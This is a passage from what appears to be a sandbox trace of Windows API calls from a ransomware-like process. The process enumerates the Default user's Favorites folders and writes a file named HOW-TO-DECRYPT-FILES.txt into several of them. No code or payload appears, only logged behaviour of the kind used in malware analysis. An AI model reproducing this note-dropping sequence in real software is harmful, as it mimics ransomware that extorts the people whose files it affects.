"c:\\users\\default\\favorites\\links\\web slice gallery.url"), fInfoLevelId=0x0, lpFileInformation=0x1cffb00 | out: lpFileInformation=0x1cffb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c8e990, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c8e990, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x299f7bb6, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xe2)) returned 1 [0048.737] GetLastError () returned 0x0 [0048.737] SetErrorMode (uMode=0x0) returned 0x1 [0048.737] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\Links\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\Links\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0048.737] GetLastError () returned 0x0 [0048.737] SetErrorMode (uMode=0x1) returned 0x0 [0048.737] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Links\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\favorites\\links\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.738] GetLastError () returned 0x5 [0048.739] SetErrorMode (uMode=0x0) returned 0x1 [0048.739] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites", nBufferLength=0x105, lpBuffer=0x18e994, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\Microsoft Websites", lpFilePart=0x0) returned 0x2d [0048.739] GetLastError () returned 0x5 [0048.739] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.739] GetLastError () returned 0x5 [0048.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.739] GetLastError () returned 0x5 [0048.739] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\Microsoft Websites", lpFilePart=0x0) returned 0x2d [0048.739] GetLastError () returned 0x5 [0048.739] SetErrorMode (uMode=0x1) returned 0x0 [0048.739] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.750] GetLastError () returned 0x5 [0048.750] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.750] GetLastError () returned 0x5 [0048.750] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.750] GetLastError () returned 0x5 [0048.750] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.750] GetLastError () returned 0x5 [0048.750] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.750] GetLastError () returned 0x5 [0048.751] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.751] GetLastError () returned 0x5 [0048.751] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.751] GetLastError () returned 0x5 [0048.751] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.751] GetLastError () returned 0x12 [0048.751] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.752] SetErrorMode (uMode=0x0) returned 0x1 [0048.752] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\Microsoft Websites", lpFilePart=0x0) returned 0x2d [0048.752] GetLastError () returned 0x12 [0048.752] SetErrorMode (uMode=0x1) returned 0x0 [0048.752] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.753] GetLastError () returned 0x12 [0048.753] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.753] GetLastError () returned 0x12 [0048.753] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.753] GetLastError () returned 0x12 [0048.753] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.753] GetLastError () returned 0x12 [0048.753] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.753] GetLastError () returned 0x12 [0048.753] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.753] GetLastError () returned 0x12 [0048.753] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.753] GetLastError () returned 0x12 [0048.753] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.753] GetLastError () returned 0x12 [0048.753] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.754] SetErrorMode (uMode=0x0) returned 0x1 [0048.754] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url", lpFilePart=0x0) returned 0x40 [0048.754] GetLastError () returned 0x12 [0048.754] SetErrorMode (uMode=0x1) returned 0x0 [0048.754] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url"), fInfoLevelId=0x0, lpFileInformation=0x1d1f6c8 | out: lpFileInformation=0x1d1f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6cb4af0, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6cb4af0, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x290260e4, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0048.755] GetLastError () returned 0x12 [0048.755] SetErrorMode (uMode=0x0) returned 0x1 [0048.759] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x46 [0048.759] GetLastError () returned 0x12 [0048.759] SetErrorMode (uMode=0x1) returned 0x0 [0048.759] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.759] GetLastError () returned 0x0 [0048.759] GetFileType (hFile=0x184) returned 0x1 [0048.759] SetErrorMode (uMode=0x0) returned 0x1 [0048.759] GetFileType (hFile=0x184) returned 0x1 [0048.760] WriteFile (in: hFile=0x184, lpBuffer=0x1b3d6e8*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed2c, lpOverlapped=0x0 | out: lpBuffer=0x1b3d6e8*, lpNumberOfBytesWritten=0x18ed2c*=0x18da, lpOverlapped=0x0) returned 1 [0048.760] GetLastError () returned 0x0 [0048.760] CloseHandle (hObject=0x184) returned 1 [0048.761] GetLastError () returned 0x0 [0048.761] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x46 [0048.761] GetLastError () returned 0x0 [0048.761] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0048.761] GetLastError () returned 0x0 [0048.761] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url", lpFilePart=0x0) returned 0x4a [0048.761] GetLastError () returned 0x0 [0048.761] SetErrorMode (uMode=0x1) returned 0x0 [0048.761] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url"), fInfoLevelId=0x0, lpFileInformation=0x1b3f3b4 | out: lpFileInformation=0x1b3f3b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c8e990, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c8e990, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x28ffff84, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0048.761] GetLastError () returned 0x0 [0048.761] SetErrorMode (uMode=0x0) returned 0x1 [0048.762] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x46 [0048.762] GetLastError () returned 0x0 [0048.762] SetErrorMode (uMode=0x1) returned 0x0 [0048.762] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.762] GetLastError () returned 0x5 [0048.763] SetErrorMode (uMode=0x0) returned 0x1 [0048.763] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url", lpFilePart=0x0) returned 0x43 [0048.764] GetLastError () returned 0x5 [0048.764] SetErrorMode (uMode=0x1) returned 0x0 [0048.764] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url"), fInfoLevelId=0x0, lpFileInformation=0x1b5d334 | out: lpFileInformation=0x1b5d334*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c8e990, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c8e990, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x290e47c5, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0048.764] GetLastError () returned 0x5 [0048.764] SetErrorMode (uMode=0x0) returned 0x1 [0048.764] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x46 [0048.764] GetLastError () returned 0x5 [0048.764] SetErrorMode (uMode=0x1) returned 0x0 [0048.765] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.765] GetLastError () returned 0x5 [0048.766] SetErrorMode (uMode=0x0) returned 0x1 [0048.766] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url", lpFilePart=0x0) returned 0x43 [0048.766] GetLastError () returned 0x5 [0048.766] SetErrorMode (uMode=0x1) returned 0x0 [0048.766] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url"), fInfoLevelId=0x0, lpFileInformation=0x1b7b284 | out: lpFileInformation=0x1b7b284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6cdac50, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6cdac50, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x290e47c5, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0048.766] GetLastError () returned 0x5 [0048.766] SetErrorMode (uMode=0x0) returned 0x1 [0048.767] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x46 [0048.767] GetLastError () returned 0x5 [0048.767] SetErrorMode (uMode=0x1) returned 0x0 [0048.767] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.767] GetLastError () returned 0x5 [0048.768] SetErrorMode (uMode=0x0) returned 0x1 [0048.768] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url", lpFilePart=0x0) returned 0x41 [0048.768] GetLastError () returned 0x5 [0048.768] SetErrorMode (uMode=0x1) returned 0x0 [0048.768] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url"), fInfoLevelId=0x0, lpFileInformation=0x1b991d4 | out: lpFileInformation=0x1b991d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c8e990, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c8e990, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x2917cd46, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x86)) returned 1 [0048.769] GetLastError () returned 0x5 [0048.769] SetErrorMode (uMode=0x0) returned 0x1 [0048.769] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x46 [0048.769] GetLastError () returned 0x5 [0048.769] SetErrorMode (uMode=0x1) returned 0x0 [0048.769] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.769] GetLastError () returned 0x5 [0048.770] SetErrorMode (uMode=0x0) returned 0x1 [0048.771] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites", nBufferLength=0x105, lpBuffer=0x18e994, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\MSN Websites", lpFilePart=0x0) returned 0x27 [0048.771] GetLastError () returned 0x5 [0048.771] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.771] GetLastError () returned 0x5 [0048.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.771] GetLastError () returned 0x5 [0048.771] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\MSN Websites", lpFilePart=0x0) returned 0x27 [0048.771] GetLastError () returned 0x5 [0048.771] SetErrorMode (uMode=0x1) returned 0x0 [0048.771] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.772] GetLastError () returned 0x5 [0048.772] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.772] GetLastError () returned 0x5 [0048.772] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.773] GetLastError () returned 0x5 [0048.773] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.773] GetLastError () returned 0x5 [0048.773] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.773] GetLastError () returned 0x5 [0048.773] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.773] GetLastError () returned 0x5 [0048.773] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.773] GetLastError () returned 0x5 [0048.773] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.773] GetLastError () returned 0x5 [0048.773] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.773] GetLastError () returned 0x12 [0048.773] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.774] SetErrorMode (uMode=0x0) returned 0x1 [0048.774] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\MSN Websites", lpFilePart=0x0) returned 0x27 [0048.774] GetLastError () returned 0x12 [0048.774] SetErrorMode (uMode=0x1) returned 0x0 [0048.774] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.775] GetLastError () returned 0x12 [0048.775] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.775] GetLastError () returned 0x12 [0048.775] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.775] GetLastError () returned 0x12 [0048.775] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.775] GetLastError () returned 0x12 [0048.775] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.775] GetLastError () returned 0x12 [0048.775] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.775] GetLastError () returned 0x12 [0048.775] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.775] GetLastError () returned 0x12 [0048.775] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.775] GetLastError () returned 0x12 [0048.776] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.776] GetLastError () returned 0x12 [0048.776] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.776] SetErrorMode (uMode=0x0) returned 0x1 [0048.776] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url", lpFilePart=0x0) returned 0x35 [0048.777] GetLastError () returned 0x12 [0048.777] SetErrorMode (uMode=0x1) returned 0x0 [0048.777] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url"), fInfoLevelId=0x0, lpFileInformation=0x1bb8a74 | out: lpFileInformation=0x1bb8a74*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c68830, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c68830, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x29130a86, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0048.778] GetLastError () returned 0x12 [0048.778] SetErrorMode (uMode=0x0) returned 0x1 [0048.778] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x40 [0048.778] GetLastError () returned 0x12 [0048.778] SetErrorMode (uMode=0x1) returned 0x0 [0048.778] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\favorites\\msn websites\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.778] GetLastError () returned 0x0 [0048.778] GetFileType (hFile=0x184) returned 0x1 [0048.778] SetErrorMode (uMode=0x0) returned 0x1 [0048.778] GetFileType (hFile=0x184) returned 0x1 [0048.778] WriteFile (in: hFile=0x184, lpBuffer=0x1bd46dc*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed2c, lpOverlapped=0x0 | out: lpBuffer=0x1bd46dc*, lpNumberOfBytesWritten=0x18ed2c*=0x18da, lpOverlapped=0x0) returned 1 [0048.779] GetLastError () returned 0x0 [0048.779] CloseHandle (hObject=0x184) returned 1 [0048.780] GetLastError () returned 0x0 [0048.780] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x40 [0048.780] GetLastError () returned 0x0 [0048.780] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0048.780] GetLastError () returned 0x0 [0048.780] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url", lpFilePart=0x0) returned 0x3d [0048.780] GetLastError () returned 0x0 [0048.780] SetErrorMode (uMode=0x1) returned 0x0 [0048.780] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url"), fInfoLevelId=0x0, lpFileInformation=0x1bd6390 | out: lpFileInformation=0x1bd6390*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c68830, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c68830, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x29130a86, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0048.780] GetLastError () returned 0x0 [0048.780] SetErrorMode (uMode=0x0) returned 0x1 [0048.781] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x40 [0048.781] GetLastError () returned 0x0 [0048.781] SetErrorMode (uMode=0x1) returned 0x0 [0048.781] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\favorites\\msn websites\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.781] GetLastError () returned 0x5 [0048.782] SetErrorMode (uMode=0x0) returned 0x1 [0048.782] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url", lpFilePart=0x0) returned 0x35 [0048.782] GetLastError () returned 0x5 [0048.782] SetErrorMode (uMode=0x1) returned 0x0 [0048.782] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url"), fInfoLevelId=0x0, lpFileInformation=0x1bf41a4 | out: lpFileInformation=0x1bf41a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c68830, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c68830, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x29130a86, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0048.783] GetLastError () returned 0x5 [0048.783] SetErrorMode (uMode=0x0) returned 0x1 [0048.783] GetFullPathNameW (in: 